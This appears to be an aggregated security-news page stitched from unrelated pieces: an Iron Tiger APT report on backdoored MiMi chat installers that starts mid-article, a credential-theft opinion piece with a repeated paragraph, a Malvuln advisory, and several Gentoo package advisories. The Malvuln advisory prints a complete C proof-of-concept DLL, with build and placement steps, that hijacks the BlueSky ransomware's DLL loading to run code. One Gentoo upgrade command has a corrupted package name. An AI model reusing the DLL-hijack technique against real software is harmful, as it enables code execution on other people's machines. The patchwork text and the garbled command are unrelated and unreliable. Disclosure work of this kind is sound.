The group previously launched politically motivated, profiteering, and intelligence-gathering-driven cyberespionage campaigns. For instance, **in June 2018**, Iron Tiger APT was caught targeting a national data center of an unknown Central Asian country using a **watering hole attack**.

**In March 2018**, the same group was identified in a cyber attack against Pakistani government infrastructure. In April 2021, Iron Tiger APT was once again caught spying on Vietnam’s government and military organizations with FoundCore RAT.

Iron Tiger’s latest campaign was identified in June after Trend Micro researchers downloaded infected versions of MiMi’s iOS version.

In this campaign, Iron Tiger’s modus operandi involves compromising the MiMi Chat app servers to infect unsuspecting users’ devices. The app uses ElectronJS cross-platform framework for its desktop version.

**According to** Sekoia, The campaign has all elements of a supply chain attack since the app’s backend servers that host MiMi’s legit installers are controlled by the attackers. The modified MiMi installers download an in-memory, custom backdoor called **HyperBro** on the targeted device. 

**Attackers Constantly Modified Chat App Installers to Deliver Malware**

Researchers confirmed that Iron Tiger started accessing MiMi’s host server in November 2021. when the developers released new versions of the MiMi chat app, the malware operators further exploited their access to host servers to modify the installers quickly.

It only took one and a half hours for the malware operators to alter the legit installers, while for older versions, it took them a day only to perform the modification.

**Malware Capabilities**

According to their **blog post**, Trend Micro discovered various rshell samples, including one that targeted Linux. Researchers analyzed the iOS sample and identified that it fetched rshell backdoor for macOS and can collect system data and transmit it to a C2 server. It could also execute commands from the attackers and send results to the same C2 server.

Further probe revealed that the backdoor could open/close/execute commands in a shell, read, delete, or close files, list directories, and prepare files for uploading/downloading. As per the researchers, the oldest sample was uploaded in June 2021.

**Why the Backdoored App Didn’t Raise Suspicion**

Researchers pointed out that the MiMi chat app’s backdoored versions went unnoticed and didn’t raise any red flags because the legit installers weren’t signed. This means users would go through multiple system warnings when installing the app.

1.  **Old crypto malware makes come back, hits Windows, Linux devices**
2.  **CrossRAT keylogging malware targets Linux, macOS & Windows PCs**
3.  **Multi-platform SysJoker backdoor Hit Windows, macOS, Linux Devices**
4.  **ElectroRat crypto-stealing malware hits macOS, Windows, Linux devices**
5.  **Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool**

Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

Credential theft is clearly still a problem. Even after years of warnings, changing password requirements, and multiple forms of authentication, password stealing remains a top attack method used by cyber criminals.
The latest report from the Ponemon Institute shares that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks. 59% of organizations

Credential theft is clearly still a problem. Even after years of warnings, changing password requirements, and multiple forms of authentication, password stealing remains a top attack method used by cyber criminals.

The latest report from the Ponemon Institute shares that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks. 59% of organizations aren't revoking credentials that are no longer needed, meaning passwords can go unattended and dormant like a sitting duck (similar to what happened with Colonial Pipeline). And Verizon's Data Breach Investigations Report cites that nearly 50% of all data breaches were caused by stolen credentials.

The stats don't lie. Cybercriminals are advancing, there's no doubt, but if there's an option to take the path of least resistance, they'll take it. Too often, that means compromising passwords and exploiting vulnerable access points.

**Credential Theft and Critical Access**

The Verizon report also states that stolen credentials are most often used to target some form of a web application. Web applications are one of the top attack vectors, according to the report, which is a problem considering organizations across industries are finding digital solutions and using internet-enabled technology to streamline operations. Take the manufacturing industry, for example: if a PLC malfunctioned, a contractor or vendor used to physically fix the issue at the manufacturing facility. Now, the repairs can be done remotely since PLCs can be connected to the internet, and third-party technicians can use remote access to connect to and fix the PLC.

The healthcare sector faces the same situation. Healthcare facilities use internet-enabled devices to quickly share data, access patient records, and grant access to remote vendors to connect to machines.

We're in an evolving, digital era where companies can become more efficient, productive, and profitable by automating tasks and introducing new technology to their workflow. But, since a lot of that involves connecting devices to the internet and granting remote access to third-party vendors as we've just seen, it also means introducing risk at each access point.

If you can use the internet to access an asset (whether that's a network, server, or data), so can a bad actor. And if you can use credentials to unlock it, guess what – so can a bad actor. Add third-party remote access into the mix and you have a nasty combination of vulnerabilities.

Organizations need to play catch-up when it comes to the security of their credentials, IoT, and third-party vendor connections. If they don't, they'll be playing a different kind of catch-up: remediating all the damage a bad actor has already done.

**Protect Credentials With Password Vaults**

It might seem like the problem is unavoidable. We're creating a potential gateway for a bad actor to exploit every time we create a password that leads to a critical resource, whether that password is meant for an internal or external user.

For those who have gone too long thinking, "I don't need to worry about password management," — it's time to worry. Or it's at least time to do something about it. Credentials are the keys to the kingdom, whether that means they can get you down the road to the entire kingdom via third-party remote access or they take you directly to the kingdom of mission critical assets and resources. Either way, protecting credentials by using password vaults is arguably the best way to manage passwords and ensure they stay out of the wrong hands.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Credential Theft Is (Still) A Top Attack Method

The BlueSky Win32.Ransom.BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a DLL, execute our own code, and control and terminate the malware pre-encryption. The exploit DLL checks if the current directory is "C:\Windows\System32" and if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/961fa85207cdc4ef86a076bbff07a409.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Win32.Ransom.BlueSkyVulnerability: Arbitrary Code ExecutionDescription: The BlueSky ransomware looks for and executes arbitrary DLLs in its current working directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our own process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: BlueSkyType: PE32MD5: 961fa85207cdc4ef86a076bbff07a409Vuln ID: MVID-2022-0632Disclosure: 08/13/2022PoC Video URL: https://www.youtube.com/watch?v=osuS8GjdERMExploit/PoC:1) Compile the following C code as "CRYPTSP.dll" 32-bit2) Place the DLL in same directory as the vuln BlueSky ransomware3) Run malware#include "windows.h"//By malvuln - August 2022//Purpose: PWN BlueSky ransomware MD5: 961fa85207cdc4ef86a076bbff07a409//gcc -c CRYPTSP.c -m32//gcc -shared -o CRYPTSP.dll CRYPTSP.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "BlueSky Ransom\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Win32.Ransom.BlueSky MVID-2022-0632 Code Execution

Gentoo Linux Security Advisory 202208-31 - Multiple vulnerabilities have been found in GStreamer and its plugins, the worst of which could result in arbitrary code execution. Versions less than 1.16.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GStreamer, GStreamer Plugins: Multiple Vulnerabilities  
     Date: August 14, 2022  
     Bugs: #766336, #785652, #785655, #785658, #785661, #835368, #843770, #765163  
       ID: 202208-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in GStreamer and its plugins,  
the worst of which could result in arbitrary code execution.

Background  
=========  
GStreamer is an open source multimedia framework.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/gst-plugins-bad < 1.16.3                    >= 1.16.3  
  2  media-libs/gst-plugins-base< 1.18.4                    >= 1.18.4  
  3  media-libs/gst-plugins-good< 1.18.4                    >= 1.18.4  
  4  media-libs/gst-plugins-ugly< 1.18.4                    >= 1.18.4  
  5  media-libs/gstreamer       < 1.20.2                    >= 1.20.2  
  6  media-plugins/gst-plugins-libav< 1.18.4                >= 1.18.4

Description  
==========  
Multiple vulnerabilities have been found in GStreamer and its plugins.  
Please review the CVE and GStreamer-SA identifiers referenced below for  
details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All GStreamer users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gstreamer-1.20.2"

All gst-plugins-bad users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gst-plugins-bad-1.20.2"

All gst-plugins-good users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gst-plugins-good-1.20.2"

All gst-plugins-ugly users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gst-plugins-ugly-1.20.2"

All gst-plugins-base users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gst-plugins-base-1.20.2"

All gst-plugins-libav users should update to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-plugins/gst-plugins-libav-1.20.2"

References  
=========  
[ 1 ] CVE-2021-3185  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3185  
[ 2 ] CVE-2021-3497  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3497  
[ 3 ] CVE-2021-3498  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3498  
[ 4 ] CVE-2021-3522  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3522  
[ 5 ] GStreamer-SA-2021-0001  
[ 6 ] GStreamer-SA-2021-0002  
[ 7 ] GStreamer-SA-2021-0004  
[ 8 ] GStreamer-SA-2021-0005

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-31

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-31

Gentoo Linux Security Advisory 202208-30 - Multiple vulnerabilities have been discovered in Binutils, the worst of which could result in denial of service. Versions less than 2.38 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: GNU Binutils: Multiple Vulnerabilities  
     Date: August 14, 2022  
     Bugs: #778545, #792342, #829304  
       ID: 202208-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Binutils, the worst of  
which could result in denial of service.

Background  
=========  
The GNU Binutils are a collection of tools to create, modify and analyse  
binary files. Many of the files use BFD, the Binary File Descriptor  
library, to do low-level manipulation.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  sys-devel/binutils         < 2.38                        >= 2.38  
  2  sys-libs/binutils-libs     < 2.38                        >= 2.38

Description  
==========  
Multiple vulnerabilities have been discovered in GNU Binutils. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Binutils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-devel/binutils-2.38"

All Binutils library users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-libs/binutils-libs-2.38"

References  
=========  
[ 1 ] CVE-2021-3487  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3487  
[ 2 ] CVE-2021-3530  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3530  
[ 3 ] CVE-2021-3549  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3549  
[ 4 ] CVE-2021-20197  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20197  
[ 5 ] CVE-2021-20284  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20284  
[ 6 ] CVE-2021-20294  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20294  
[ 7 ] CVE-2021-45078  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45078

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-30

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-30

Gentoo Linux Security Advisory 202208-29 - Multiple vulnerabilities have been discovered in Nokogiri, the worst of which could result in denial of service. Versions less than 1.13.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-29  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Nokogiri: Multiple Vulnerabilities  
     Date: August 14, 2022  
     Bugs: #846623, #837902, #762685  
       ID: 202208-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Nokogiri, the worst of  
which could result in denial of service.

Background  
=========  
Nokogiri is an HTML, XML, SAX, and Reader parser.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-ruby/nokogiri          < 1.13.6                    >= 1.13.6

Description  
==========  
Multiple vulnerabilities have been discovered in Nokogiri. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Nokogiri users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-ruby/nokogiri-1.13.6"

References  
=========  
[ 1 ] CVE-2020-26247  
      https://nvd.nist.gov/vuln/detail/CVE-2020-26247  
[ 2 ] CVE-2022-24836  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24836  
[ 3 ] CVE-2022-29181  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29181

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-29

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-29

Gentoo Linux Security Advisory 202208-28 - Multiple vulnerabilities have been discovered in Puma, the worst of which could result in denial of service. Versions less than 5.6.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Puma: Multiple Vulnerabilities  
     Date: August 14, 2022  
     Bugs: #794034, #817893, #833155, #836431  
       ID: 202208-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Puma, the worst of  
which could result in denial of service.

Background  
=========  
Puma is a simple, fast, threaded, and highly concurrent HTTP 1.1 server  
for Ruby/Rack.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-servers/puma           < 5.6.4                      >= 5.6.4

Description  
==========  
Multiple vulnerabilities have been discovered in Puma. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Puma users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-servers/puma-5.6.4"

References  
=========  
[ 1 ] CVE-2021-29509  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29509  
[ 2 ] CVE-2021-41136  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41136  
[ 3 ] CVE-2022-23634  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23634  
[ 4 ] CVE-2022-24790  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24790

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-28

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac